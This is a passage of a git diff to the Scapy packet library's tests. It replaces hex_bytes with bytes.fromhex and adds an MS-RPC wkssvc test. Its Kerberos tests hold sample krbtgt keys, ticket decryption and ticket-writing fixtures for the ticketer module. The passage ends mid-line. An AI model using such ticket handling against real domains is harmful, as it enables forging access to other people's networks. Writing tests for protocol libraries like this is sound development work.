+ ssp=clissp, + ndr64=False, +) +client.connect(get_if_addr(conf.loopback_name), port=12345) +client.bind(find_dcerpc_interface("wkssvc")) + +req = NetrWkstaGetInfo_Request( + ServerName="Nice", + Level=0x00000064, # WKSTA_INFO_100 + ndr64=False +) +resp = client.sr1_req(req) + +assert isinstance(resp.valueof("WkstaInfo"), LPWKSTA_INFO_100) +assert resp.valueof("WkstaInfo").valueof("wki100_computername") == b"NiceServer" + += Functional: Close the server + +# Close everything now +client.close() +try: + rpcserver.shutdown(socket.SHUT_RDWR) +except OSError: + pass + +rpcserver.close() + = Functional: Re-Start the same MS-RPC server over NCACN_NP rpcserver = MyRPCServer.spawn( diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 2202eb262f4..3793d2dc4a4 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -123,5 +123,5 @@ assert DHCPRevOptions['static-routes'][0] == 33 assert dhcpd import IPython -assert IPython.lib.pretty.pretty(dhcpd) == '' +assert IPython.lib.pretty.pretty(dhcpd) == '' diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index 500a28d6d21..12133d8b351 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -131,7 +131,7 @@ assert tgsrep.encryptedPaData[0].padataValue.flags == 0x1f = FAST - Parse FAST AS-Req -pkt = Ether(hex_bytes(b'52540013d0835254003ea3be08004502089636a1400080063ad3c0a87fd2c0a87fc8fecc0058eea93069573b278e50180402897400000000086a6a82086630820862a103020105a20302010aa38207a23082079e3082079aa10402020088a28207900482078ca082078830820784a082064a30820646a003020101a182063d048206396e82063530820631a003020105a10302010ea20703050000000000a38205796182057530820571a003020105a10c1b0a444f4d312e4c4f43414ca21f301da003020102a11630141b066b72627467741b0a444f4d312e4c4f43414ca382053930820535a003020112a103020102a282052704820523acc8b7671c0d50522f1a8d8452ce450aceb40fff0229e8ee546bccf1512e4877ef93dde465595260a6a5a8e85ea38600ce8dff7d510f3c744e2c43eb9d3187d638f716c29b6e7aa9eb407de28d0161f49013966eda0a161ff174dad42e7aa500cfe298541215448013ffe4883b6b1166f908f50de129487fe77fff874fd4102cdcce8db8dbeb8da02f08cc88b3790cdad5ec499959c7e79d6fef107d1e17ce80cc3df050b7e7a1c31f278e4fd4ea9523c950876f174be363234f8495b9550de1560ba17daeafbf133f78991053d929ad3fd668327d42288e6581671daaef908682ee282e17c31d8f8bb55d27fce155ee2e84a2ff8bc9600891be15e6ede3e1bbd2742a7af8b0a32c48973c9e3776a69647bab11592756c5a15b9101c392efa35d000abb3dabccd97e64426e3fd8d47e0e369c83b5391f38947d536d351c061081d654eef1a3861cdb2ea2bc48222b450d1b7d09c0670493bccc60dfcaa5cfe46fd50adf8e388204a4691dc5f0c3dbae0b4da6ac2dd781f149a444840aaa3a3c3befb5a5c04ee0405baed66afcf9b988d10ea14a955f43df79465e6fc02a12bce3870988950f1ab48e1a4f876f351671c5061e6399a63cb0479f7bd017dfd9bc5be192faf6d4f11e6ee6003933eeaf632f0056c4c1ccd183d7977cfca85419fe5b039674419d802068e792c9576ae2a88bfbeb1f59273226782c6efb288717d8f7a4bc3bf4c697fcac1adc1829f0a914f2559b278ccadd108eb87a11dacc88e4302e9af627474e57171192b94c6b358f8f98e308596215d2fb9d9c2b49c4cbedcb43fc231b86f0493d56b82962cf3383a84f8922c2b99f8fa8fdd85797b09a6e60f72007c0379988be2ff1cfc16f21300c1b4b784174005a9185f760e68ef94b9384eb24decee31b63d1b92278cd75b85d4d80c4e83306533a9d95aa6207cbfbeb0970a41c44aba59839f007923ecd8ff0de8314990a435dbea4dedbee16faf5ab2be9f96d691cfa983a6c843bd183f84c1b4998a3eaa907cae6b82b0ae8363f3edd8cb03d3c9c60ff55a84d8a292ea20555fbd6ce5ad4ad7a6b4bc5bff2e02c477a7a8a98d5a387d389caa172c400b151d95871b2aa16a040dc71a9be5f0774b06a5ca87674ccb4109a2c41db9e3160704218ad495d0751194fbef4becae4d7be24b9d968da592256a2b22cf724e989e71a60d0603b59bebd475285f793794b7a18af49a2b68670e3a6247c453274e35c863a16b5023c6c94659e25abb27c760f989ac0bbf9a5b125d0ea34fb03225cc93d5b8b6829e906883ee76cf8ee61dfacc488e8dc5cbc8ba9705a9e915a68f838232394f97fb1aac4a2a90fe17d46f9c51946a2bf9598df7f5b5e7ee692a78860eea3cef748a5be36529228e40b4aec83ebc8bb14176a4c565b06500e9517229b8340c55812101dbbc6bee693c35873082a5a1a53b35cf3509193d4dc5175c9360a00da71692ba205b3264aecc9ecc8bca31fec43efc8701423bb484f6f21699439dd30f71228f16eaab96b7de3547721d1635bbfe50678900ac378a4958b6c34964f3e0dc843880dbde57fb4a76ab85eba2b190bfdaefc7ba17e109f839493b0f2d6fc7ea17403bebe06f2809314ca514606f54668082364ed6752019f27e1df74f93fcf1c25630a29713a89d4a998c444bc91279c6fc66e0aa5dec72be316e1160cf9f90d5915c464b6bfec5216e901be4726db596a15745511c63736a69ac9ecb9e86601c631b4992653c320e6983562fa613134560cb606621e9661ac5961313ee70868ab48d6010173d8a96fffdb2baf4afe18c846d3fed6f30b9a809d72e647735fc536edec543abc232480d28660395a4819e30819ba003020112a281930481901273d5af61ad426d51d0757e897917caeb6fc1b6950554e8d750f95d27f444e3aaf7ae0bf4595b5e906d9682dbdeedcf6eb42a84ab8092997b783f57710127228165deeb2ce5e09e2ddc71555dc31970a8312d888b8ae766382098276d62b4bd76f34cbc889e24ad5405ec037ceb724fdb71fe247fe2a414a037ed33c796f4475fcfb5993eed147b6d63d740d58da5b0a1173015a003020110a10e040c75f02d8d2954e0ae1a9e0653a282011930820115a003020112a282010c04820108ae9bbc4629c80f4a383a69c4583824295c75f34b000b3fdbdaab073a042935e32c29e0ee2b2b446e4a6a2592362d0d593cddd74dacc24f16353776e1b5d192ad1cf5e63f66f40a134ecb87c077c30922bc0cab00ae23d187d56090d9098f843c54fabe7c012ff87e317dfe339c40911264609d489b041a4e9b52c0eb03ee88a393d17da92786bd1716b92eb0d7a5a24a64ade0870dea8a7e138acdf209ee277cb3fadeedab173fd64cc10a1004010774658b94852639bda10a5e8aff29174e3d2c7032c32631b074afdac0e6832bae74de9be19e522f63bc8499753a209291fee1861c29096cc8ee3cfda5be235b0aa95635916edcfcdaf90b896e2eaa5a57d5e4da0b00408f4201a481af3081aca00703050040810010a11a3018a003020101a111300f1b0d61646d2d302d66617374656e62a2061b04444f4d31a3193017a003020102a110300e1b066b72627467741b04444f4d31a511180f32303337303931333032343830355aa611180f32303337303931333032343830355aa70602043f58a7a0a81530130201120201110201170201180202ff79020103a91d301b3019a003020114a112041053525620202020202020202020202020')) +pkt = Ether(bytes.fromhex('52540013d0835254003ea3be08004502089636a1400080063ad3c0a87fd2c0a87fc8fecc0058eea93069573b278e50180402897400000000086a6a82086630820862a103020105a20302010aa38207a23082079e3082079aa10402020088a28207900482078ca082078830820784a082064a30820646a003020101a182063d048206396e82063530820631a003020105a10302010ea20703050000000000a38205796182057530820571a003020105a10c1b0a444f4d312e4c4f43414ca21f301da003020102a11630141b066b72627467741b0a444f4d312e4c4f43414ca382053930820535a003020112a103020102a282052704820523acc8b7671c0d50522f1a8d8452ce450aceb40fff0229e8ee546bccf1512e4877ef93dde465595260a6a5a8e85ea38600ce8dff7d510f3c744e2c43eb9d3187d638f716c29b6e7aa9eb407de28d0161f49013966eda0a161ff174dad42e7aa500cfe298541215448013ffe4883b6b1166f908f50de129487fe77fff874fd4102cdcce8db8dbeb8da02f08cc88b3790cdad5ec499959c7e79d6fef107d1e17ce80cc3df050b7e7a1c31f278e4fd4ea9523c950876f174be363234f8495b9550de1560ba17daeafbf133f78991053d929ad3fd668327d42288e6581671daaef908682ee282e17c31d8f8bb55d27fce155ee2e84a2ff8bc9600891be15e6ede3e1bbd2742a7af8b0a32c48973c9e3776a69647bab11592756c5a15b9101c392efa35d000abb3dabccd97e64426e3fd8d47e0e369c83b5391f38947d536d351c061081d654eef1a3861cdb2ea2bc48222b450d1b7d09c0670493bccc60dfcaa5cfe46fd50adf8e388204a4691dc5f0c3dbae0b4da6ac2dd781f149a444840aaa3a3c3befb5a5c04ee0405baed66afcf9b988d10ea14a955f43df79465e6fc02a12bce3870988950f1ab48e1a4f876f351671c5061e6399a63cb0479f7bd017dfd9bc5be192faf6d4f11e6ee6003933eeaf632f0056c4c1ccd183d7977cfca85419fe5b039674419d802068e792c9576ae2a88bfbeb1f59273226782c6efb288717d8f7a4bc3bf4c697fcac1adc1829f0a914f2559b278ccadd108eb87a11dacc88e4302e9af627474e57171192b94c6b358f8f98e308596215d2fb9d9c2b49c4cbedcb43fc231b86f0493d56b82962cf3383a84f8922c2b99f8fa8fdd85797b09a6e60f72007c0379988be2ff1cfc16f21300c1b4b784174005a9185f760e68ef94b9384eb24decee31b63d1b92278cd75b85d4d80c4e83306533a9d95aa6207cbfbeb0970a41c44aba59839f007923ecd8ff0de8314990a435dbea4dedbee16faf5ab2be9f96d691cfa983a6c843bd183f84c1b4998a3eaa907cae6b82b0ae8363f3edd8cb03d3c9c60ff55a84d8a292ea20555fbd6ce5ad4ad7a6b4bc5bff2e02c477a7a8a98d5a387d389caa172c400b151d95871b2aa16a040dc71a9be5f0774b06a5ca87674ccb4109a2c41db9e3160704218ad495d0751194fbef4becae4d7be24b9d968da592256a2b22cf724e989e71a60d0603b59bebd475285f793794b7a18af49a2b68670e3a6247c453274e35c863a16b5023c6c94659e25abb27c760f989ac0bbf9a5b125d0ea34fb03225cc93d5b8b6829e906883ee76cf8ee61dfacc488e8dc5cbc8ba9705a9e915a68f838232394f97fb1aac4a2a90fe17d46f9c51946a2bf9598df7f5b5e7ee692a78860eea3cef748a5be36529228e40b4aec83ebc8bb14176a4c565b06500e9517229b8340c55812101dbbc6bee693c35873082a5a1a53b35cf3509193d4dc5175c9360a00da71692ba205b3264aecc9ecc8bca31fec43efc8701423bb484f6f21699439dd30f71228f16eaab96b7de3547721d1635bbfe50678900ac378a4958b6c34964f3e0dc843880dbde57fb4a76ab85eba2b190bfdaefc7ba17e109f839493b0f2d6fc7ea17403bebe06f2809314ca514606f54668082364ed6752019f27e1df74f93fcf1c25630a29713a89d4a998c444bc91279c6fc66e0aa5dec72be316e1160cf9f90d5915c464b6bfec5216e901be4726db596a15745511c63736a69ac9ecb9e86601c631b4992653c320e6983562fa613134560cb606621e9661ac5961313ee70868ab48d6010173d8a96fffdb2baf4afe18c846d3fed6f30b9a809d72e647735fc536edec543abc232480d28660395a4819e30819ba003020112a281930481901273d5af61ad426d51d0757e897917caeb6fc1b6950554e8d750f95d27f444e3aaf7ae0bf4595b5e906d9682dbdeedcf6eb42a84ab8092997b783f57710127228165deeb2ce5e09e2ddc71555dc31970a8312d888b8ae766382098276d62b4bd76f34cbc889e24ad5405ec037ceb724fdb71fe247fe2a414a037ed33c796f4475fcfb5993eed147b6d63d740d58da5b0a1173015a003020110a10e040c75f02d8d2954e0ae1a9e0653a282011930820115a003020112a282010c04820108ae9bbc4629c80f4a383a69c4583824295c75f34b000b3fdbdaab073a042935e32c29e0ee2b2b446e4a6a2592362d0d593cddd74dacc24f16353776e1b5d192ad1cf5e63f66f40a134ecb87c077c30922bc0cab00ae23d187d56090d9098f843c54fabe7c012ff87e317dfe339c40911264609d489b041a4e9b52c0eb03ee88a393d17da92786bd1716b92eb0d7a5a24a64ade0870dea8a7e138acdf209ee277cb3fadeedab173fd64cc10a1004010774658b94852639bda10a5e8aff29174e3d2c7032c32631b074afdac0e6832bae74de9be19e522f63bc8499753a209291fee1861c29096cc8ee3cfda5be235b0aa95635916edcfcdaf90b896e2eaa5a57d5e4da0b00408f4201a481af3081aca00703050040810010a11a3018a003020101a111300f1b0d61646d2d302d66617374656e62a2061b04444f4d31a3193017a003020102a110300e1b066b72627467741b04444f4d31a511180f32303337303931333032343830355aa611180f32303337303931333032343830355aa70602043f58a7a0a81530130201120201110201170201180202ff79020103a91d301b3019a003020114a112041053525620202020202020202020202020')) fastreq = pkt.root.padata[0].padataValue @@ -141,7 +141,7 @@ assert isinstance(fastreq, PA_FX_FAST_REQUEST) from scapy.libs.rfc3961 import Key, EncryptionType krbtgt_hex = "ac67a63d7155791fe31dace230ab516e818c453dfdbd44cbe691b240725c4907" -krbtgt = Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=hex_bytes(krbtgt_hex)) +krbtgt = Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=bytes.fromhex(krbtgt_hex)) enc = fastreq.armoredData.armor.armorValue.ticket.encPart encticketpart = enc.decrypt(krbtgt) @@ -883,8 +883,8 @@ from scapy.modules.ticketer import * from scapy.utils import get_temp_file -CCACHE_DATA = hex_bytes("0504000c00010008ffffffff0000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000002000000020000000c444f4d41494e2e4c4f43414c000000066b72627467740000000c444f4d41494e2e4c4f43414c0012000000208b4226a190866cbe345ae5e668823edd5359cb00bd479a6428bc8feb1ba55752633332fa633332fa6333bf9a633484770050e100000000000000000000000004486182044430820440a003020105a10e1b0c444f4d41494e2e4c4f43414ca221301fa003020102a11830161b066b72627467741b0c444f4d41494e2e4c4f43414ca382040430820400a003020112a103020102a28203f2048203ee662c2aefcca3f8c78de38e1af1d63b18de011d864d9bec12f3c11e20b0bbdc46e6f5c8311b331b1cc27b23193e90fa47ba7aa6a67fba5826a1f4754ea5050eeab2e07d07a3ec1029b2a11e058ce31e48f4de2bce017e9c2915ee40ffa0f7109597088286fa290fe6ca777465162c5757a67cc53a8e3204846a4ca9cff30c8073d1e9e735b5eb22717f9777c2f38fb13d204952db15e4f160e26535f596f3ce64f9a8d96011718d0405650d7f7c728f87dd2d0e220e4610347faa8a45099b63a351f5adcfccf669d9b6112e31881af869561294a21eb6e2b164b8ce6c6c7b0327ec6c71c23784b06c19030a3f81119f377cb6f0395b5477bffbc5c1a2264ec4af76f4b39a4e2f7030d48c8ebbcaf212036ea0a5abdd5da91fcdc3fb9700d5379f03fbc9fe3a47078dae30b05a418f46ee9ea25f520eb7e67b53d96f7f486e5878b22ea8f4215137a7dcf7f4b6f50463715d9d3c544f294420ed0f7426955fa0a527efce86264f7c29bdfc2cee2c3eb227eb4b7651eb8008e0eb269446a45488296b0427f82b959ad070146cd8a9aed9ef236815bd2149f3f86d73227584f294dc86cf4a77e4eeabf98f4f342dbfc4beb46d834b0c3103d8c5964cad4852eed365ca8e50937e21976122d5cde18c5ab6dd5528c3a680c0a219711766dd5b6a3c103ae65ad5f573a31543a0ebcefde1749062951030f63907cde092010c22c90763248c9f6cd03a6f0a7cb9a7b7441bc7de4c40c1d749373afee597a52c9dbe7533d7ba24a3a26df29474b93643eed97f6b8ffd13976869844841bdd364f2454d6e3ce1ae677ec01c592c25b50e120303240ddaac82dfa9d63b1c42c239b78a6c4ebba2b6458b924931c52b223b9c9cfd6cf0f083e6239e30747f1302de8bde94fe8756b5e0118f5ed61dccc3862ddbc93f103c3160ac15858cbe330420d6e07e2c9f242c2caf8f04d83f3cd71f404c1d56814c9e2aa787763abc295334299487f454e4b4eb5f0e7c3cf5e377374acf827c9fe255e1c7cdb13129ef07c731164ee4eed503f735829a8b7cc2e3718db23d85838fbf7a43861a1c8f890e4c33437b65749946b46f6cff1767158f5684b035f2ea086f7b564f6a57050714b4cad5165b72be6f7a6820b2e9f8936506147e64a77a2f9cf9c13fe4fd59b83191898101068a003e6f7f918006616204ff4b18a9bf495497ba0df0dfcbb89a5e643c60637667357fcf1d97b424240ea75fcf0d26bb159055107f80d1bc682c9057f22a3ef5fb0f50adb30ba975b25069d393bf7eb2522f230912ac1e64bba93c91aa760abb1209bb1313e38dddebcac325d27bef99d66045c09799b71020a44f64bbb59c405449304fd95b8d6bdc6d17e476cba188f30ad04bb6c91d91b028b0953986929a9fb42b21f73028c8ba1f416c70630000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000000000000030000000c582d4341434845434f4e463a000000156b7262355f6363616368655f636f6e665f646174610000000770615f74797065000000206b72627467742f444f4d41494e2e4c4f43414c40444f4d41494e2e4c4f43414c0000000000000000000000000000000000000000000000000000000000000000000000000000013200000000") -KRBTGT = hex_bytes("6df5a9a90cb076f4d232a123d9c24f46ae11590a5430710bc1881dca337989ce") +CCACHE_DATA = bytes.fromhex("0504000c00010008ffffffff0000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000002000000020000000c444f4d41494e2e4c4f43414c000000066b72627467740000000c444f4d41494e2e4c4f43414c0012000000208b4226a190866cbe345ae5e668823edd5359cb00bd479a6428bc8feb1ba55752633332fa633332fa6333bf9a633484770050e100000000000000000000000004486182044430820440a003020105a10e1b0c444f4d41494e2e4c4f43414ca221301fa003020102a11830161b066b72627467741b0c444f4d41494e2e4c4f43414ca382040430820400a003020112a103020102a28203f2048203ee662c2aefcca3f8c78de38e1af1d63b18de011d864d9bec12f3c11e20b0bbdc46e6f5c8311b331b1cc27b23193e90fa47ba7aa6a67fba5826a1f4754ea5050eeab2e07d07a3ec1029b2a11e058ce31e48f4de2bce017e9c2915ee40ffa0f7109597088286fa290fe6ca777465162c5757a67cc53a8e3204846a4ca9cff30c8073d1e9e735b5eb22717f9777c2f38fb13d204952db15e4f160e26535f596f3ce64f9a8d96011718d0405650d7f7c728f87dd2d0e220e4610347faa8a45099b63a351f5adcfccf669d9b6112e31881af869561294a21eb6e2b164b8ce6c6c7b0327ec6c71c23784b06c19030a3f81119f377cb6f0395b5477bffbc5c1a2264ec4af76f4b39a4e2f7030d48c8ebbcaf212036ea0a5abdd5da91fcdc3fb9700d5379f03fbc9fe3a47078dae30b05a418f46ee9ea25f520eb7e67b53d96f7f486e5878b22ea8f4215137a7dcf7f4b6f50463715d9d3c544f294420ed0f7426955fa0a527efce86264f7c29bdfc2cee2c3eb227eb4b7651eb8008e0eb269446a45488296b0427f82b959ad070146cd8a9aed9ef236815bd2149f3f86d73227584f294dc86cf4a77e4eeabf98f4f342dbfc4beb46d834b0c3103d8c5964cad4852eed365ca8e50937e21976122d5cde18c5ab6dd5528c3a680c0a219711766dd5b6a3c103ae65ad5f573a31543a0ebcefde1749062951030f63907cde092010c22c90763248c9f6cd03a6f0a7cb9a7b7441bc7de4c40c1d749373afee597a52c9dbe7533d7ba24a3a26df29474b93643eed97f6b8ffd13976869844841bdd364f2454d6e3ce1ae677ec01c592c25b50e120303240ddaac82dfa9d63b1c42c239b78a6c4ebba2b6458b924931c52b223b9c9cfd6cf0f083e6239e30747f1302de8bde94fe8756b5e0118f5ed61dccc3862ddbc93f103c3160ac15858cbe330420d6e07e2c9f242c2caf8f04d83f3cd71f404c1d56814c9e2aa787763abc295334299487f454e4b4eb5f0e7c3cf5e377374acf827c9fe255e1c7cdb13129ef07c731164ee4eed503f735829a8b7cc2e3718db23d85838fbf7a43861a1c8f890e4c33437b65749946b46f6cff1767158f5684b035f2ea086f7b564f6a57050714b4cad5165b72be6f7a6820b2e9f8936506147e64a77a2f9cf9c13fe4fd59b83191898101068a003e6f7f918006616204ff4b18a9bf495497ba0df0dfcbb89a5e643c60637667357fcf1d97b424240ea75fcf0d26bb159055107f80d1bc682c9057f22a3ef5fb0f50adb30ba975b25069d393bf7eb2522f230912ac1e64bba93c91aa760abb1209bb1313e38dddebcac325d27bef99d66045c09799b71020a44f64bbb59c405449304fd95b8d6bdc6d17e476cba188f30ad04bb6c91d91b028b0953986929a9fb42b21f73028c8ba1f416c70630000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000000000000030000000c582d4341434845434f4e463a000000156b7262355f6363616368655f636f6e665f646174610000000770615f74797065000000206b72627467742f444f4d41494e2e4c4f43414c40444f4d41494e2e4c4f43414c0000000000000000000000000000000000000000000000000000000000000000000000000000013200000000") +KRBTGT = bytes.fromhex("6df5a9a90cb076f4d232a123d9c24f46ae11590a5430710bc1881dca337989ce") TICKETER_TEMPFILE = get_temp_file() @@ -933,7 +933,7 @@ t.save() = Ticketer++ - Read and check written ccache -EXPECTED_CCACHE_DATA = hex_bytes("0504000c00010008ffffffff0000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000002000000020000000c444f4d41494e2e4c4f43414c000000066b72627467740000000c444f4d41494e2e4c4f43414c0012000000208b4226a190866cbe345ae5e668823edd5359cb00bd479a6428bc8feb1ba55752633332fa633332fa6333bf9a633727770050e100000000000000000000000004486182044430820440a003020105a10e1b0c444f4d41494e2e4c4f43414ca221301fa003020102a11830161b066b72627467741b0c444f4d41494e2e4c4f43414ca382040430820400a003020112a103020102a28203f2048203eed3d1adb3a09042173463eb0ef195beb666adbaa83193905697db7340daa9fc6cd3450280651effddc129b3761d49569f3c384e450db9ef094b4619d2036126a0b1b44c983e46664ee28cdb8fc33b52d14d2a8357f6c37b31bec5074ee6ee5ab74a896460c767411d0532c6cb69e0da698054ef8f8bf87fb9e8d2d289ec1b22d1ec602ce71c80b98a14aff448374054d4987c0bd13127914a0191d93c3440b5209c4f2190c80d21e064e6f71ab269ab9c0dbf6533e8e29068a3c686b6377d3c79c902818f12a400eabd8f8bb35bce837e9cb0a4413db223bf22e13bee81eb6a4170ae863fd7082db8dac81b70f96c7880c6d5f8350209aa090b75f6343635ba01e9fafdc7700ee84bd9ae0497517ce69b89e44b3933ea3b1a6c36bd38699eba195bb22f0e694b9e952fc187cf7ee5e02b05ec2397e76c217da3c328eeccf5d4ffbe77a765127fc2828e5c8edc1987cb7fbfcfecbb308f4858f711c52ada9c3622dd43d47c29b30630ecf51b9e88cefcf06cb7862922c36a81ae09ec9f62f406f6d4a269cec849a2fe872a16026dce242c775870d827450700c9defdd204342ea1e7d72c5b1c8d92b0318f298898b19a2c705722837c2ff569fc796d55b779950be0db9955d57d349c7d7688b81b9219e376098a2902e23cd01d7bf7734089ab08bc30a7fd2d138aea4454084e3e14d76119e2ef4da6fff3b5758c58efe2904491f6dd57a7eb777aa847783b6ef905c8c796889e6d7e89952a2cef7f99d09405a07b6897291d13eb3a0c4280601b4f4d5cbd00a0125fb87eeb522cd90a8b046163c076a61115e1affe3e362700d984747f1372c92beeb3e1ce4b97ceac032ac8988c536a9594f9032463750f78ca30161e4910d8ff3810d7d4da60d90fded2fcda92a4d6a7b776ba82370130807a30ab0b648f50537453de6c575cc6c98847ae1aa342c3b324005c3988e6cfb161b5b39153cdbd7a305c4cc0949e47197673cd72c29f41f383a7c2b241bd0e70d736f6e342b88128cc38f964588aa32b860dd788a43fb91d4d934401434d6d9e6c622e58a9d99e02331ca642cd9c435305ddbf949751b8c2617489a4cefe376920b7803d493e61d4fdc41f2f6fe50bf5919ede1295eaab25db71aa6e98bbc80a32d7acc24f9cc9b651cb72d22b17031a1d03fd9166c5f488924689aa4859094b42b72c4bf467a1fdb826289bde90035aff2322c68a34b350b0b3b2818c656701b359cbfdb7eb5665439a4deb2cc95bacc358a693f2d0e31975653665fdc468d627c6eee589bbc46bd019a70e394c90529abe646105623c43956c86bf366e4be1f3560b2e4ca01f1e25432618573a9f257890a435e899724eebd9fd271abefeae2f0a55f3abb4619b9ded206bf70ac3b77622d114309e49bb42d01e8c8678765ab4b80000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000000000000030000000c582d4341434845434f4e463a000000156b7262355f6363616368655f636f6e665f646174610000000770615f74797065000000206b72627467742f444f4d41494e2e4c4f43414c40444f4d41494e2e4c4f43414c0000000000000000000000000000000000000000000000000000000000000000000000000000013200000000") +EXPECTED_CCACHE_DATA = bytes.fromhex("0504000c00010008ffffffff0000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000002000000020000000c444f4d41494e2e4c4f43414c000000066b72627467740000000c444f4d41494e2e4c4f43414c0012000000208b4226a190866cbe345ae5e668823edd5359cb00bd479a6428bc8feb1ba55752633332fa633332fa6333bf9a633727770050e100000000000000000000000004486182044430820440a003020105a10e1b0c444f4d41494e2e4c4f43414ca221301fa003020102a11830161b066b72627467741b0c444f4d41494e2e4c4f43414ca382040430820400a003020112a103020102a28203f2048203eed3d1adb3a09042173463eb0ef195beb666adbaa83193905697db7340daa9fc6cd3450280651effddc129b3761d49569f3c384e450db9ef094b4619d2036126a0b1b44c983e46664ee28cdb8fc33b52d14d2a8357f6c37b31bec5074ee6ee5ab74a896460c767411d0532c6cb69e0da698054ef8f8bf87fb9e8d2d289ec1b22d1ec602ce71c80b98a14aff448374054d4987c0bd13127914a0191d93c3440b5209c4f2190c80d21e064e6f71ab269ab9c0dbf6533e8e29068a3c686b6377d3c79c902818f12a400eabd8f8bb35bce837e9cb0a4413db223bf22e13bee81eb6a4170ae863fd7082db8dac81b70f96c7880c6d5f8350209aa090b75f6343635ba01e9fafdc7700ee84bd9ae0497517ce69b89e44b3933ea3b1a6c36bd38699eba195bb22f0e694b9e952fc187cf7ee5e02b05ec2397e76c217da3c328eeccf5d4ffbe77a765127fc2828e5c8edc1987cb7fbfcfecbb308f4858f711c52ada9c3622dd43d47c29b30630ecf51b9e88cefcf06cb7862922c36a81ae09ec9f62f406f6d4a269cec849a2fe872a16026dce242c775870d827450700c9defdd204342ea1e7d72c5b1c8d92b0318f298898b19a2c705722837c2ff569fc796d55b779950be0db9955d57d349c7d7688b81b9219e376098a2902e23cd01d7bf7734089ab08bc30a7fd2d138aea4454084e3e14d76119e2ef4da6fff3b5758c58efe2904491f6dd57a7eb777aa847783b6ef905c8c796889e6d7e89952a2cef7f99d09405a07b6897291d13eb3a0c4280601b4f4d5cbd00a0125fb87eeb522cd90a8b046163c076a61115e1affe3e362700d984747f1372c92beeb3e1ce4b97ceac032ac8988c536a9594f9032463750f78ca30161e4910d8ff3810d7d4da60d90fded2fcda92a4d6a7b776ba82370130807a30ab0b648f50537453de6c575cc6c98847ae1aa342c3b324005c3988e6cfb161b5b39153cdbd7a305c4cc0949e47197673cd72c29f41f383a7c2b241bd0e70d736f6e342b88128cc38f964588aa32b860dd788a43fb91d4d934401434d6d9e6c622e58a9d99e02331ca642cd9c435305ddbf949751b8c2617489a4cefe376920b7803d493e61d4fdc41f2f6fe50bf5919ede1295eaab25db71aa6e98bbc80a32d7acc24f9cc9b651cb72d22b17031a1d03fd9166c5f488924689aa4859094b42b72c4bf467a1fdb826289bde90035aff2322c68a34b350b0b3b2818c656701b359cbfdb7eb5665439a4deb2cc95bacc358a693f2d0e31975653665fdc468d627c6eee589bbc46bd019a70e394c90529abe646105623c43956c86bf366e4be1f3560b2e4ca01f1e25432618573a9f257890a435e899724eebd9fd271abefeae2f0a55f3abb4619b9ded206bf70ac3b77622d114309e49bb42d01e8c8678765ab4b80000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000000000000030000000c582d4341434845434f4e463a000000156b7262355f6363616368655f636f6e665f646174610000000770615f74797065000000206b72627467742f444f4d41494e2e4c4f43414c40444f4d41494e2e4c4f43414c0000000000000000000000000000000000000000000000000000000000000000000000000000013200000000") with open(TICKETER_TEMPFILE, "rb") as fd: RESULT = fd.read() @@ -1067,7 +1067,7 @@ assert k.key.hex() == '45bd806dbf6a833a9cffc1c94589a222367a79bc21c413718906e9f57 from scapy.libs.rfc3961 import _AES128CTS_SHA256_128 -k = Key(EncryptionType.AES128_CTS_HMAC_SHA256_128, key=hex_bytes("3705D96080C17728A0E800EAB6E0D23C")) +k = Key(EncryptionType.AES128_CTS_HMAC_SHA256_128, key=bytes.fromhex("3705D96080C17728A0E800EAB6E0D23C")) # Kc value for key usage 2 (label = 0x0000000299): kc = _AES128CTS_SHA256_128.derive(k, struct.pack(">IB", 2, 0x99), 128) @@ -1086,7 +1086,7 @@ assert ki.hex() == '9fda0e56ab2d85e1569a688696c26a6c' from scapy.libs.rfc3961 import _AES256CTS_SHA384_192 -k = Key(EncryptionType.AES256_CTS_HMAC_SHA384_192, key=hex_bytes("6D404D37FAF79F9DF0D33568D320669800EB4836472EA8A026D16B7182460C52")) +k = Key(EncryptionType.AES256_CTS_HMAC_SHA384_192, key=bytes.fromhex("6D404D37FAF79F9DF0D33568D320669800EB4836472EA8A026D16B7182460C52")) # Kc value for key usage 2 (label = 0x0000000299): kc = _AES256CTS_SHA384_192.derive(k, struct.pack(">IB", 2, 0x99), 192) @@ -1104,7 +1104,7 @@ assert ki.hex() == '69b16514e3cd8e56b82010d5c73012b622c4d00ffc23ed1f' # enctype aes128-cts-hmac-sha256-128: -k = Key(EncryptionType.AES128_CTS_HMAC_SHA256_128, key=hex_bytes("3705D96080C17728A0E800EAB6E0D23C")) +k = Key(EncryptionType.AES128_CTS_HMAC_SHA256_128, key=bytes.fromhex("3705D96080C17728A0E800EAB6E0D23C")) # Plaintext: (empty) # Confounder: 7E5895EAF2672435BAD817F545A37148 @@ -1200,12 +1200,52 @@ from scapy.libs.rfc3961 import Key, EncryptionType pkt = Ether(b"RT\x00iX\x13RT\x00!l+\x08\x00E\x00\x01]\xa7\x18@\x00\x80\x06\xdc\x83\xc0\xa8z\x9c\xc0\xa8z\x11\xc2\t\x00XT\xf6\xab#\x92\xc2[\xd6P\x18 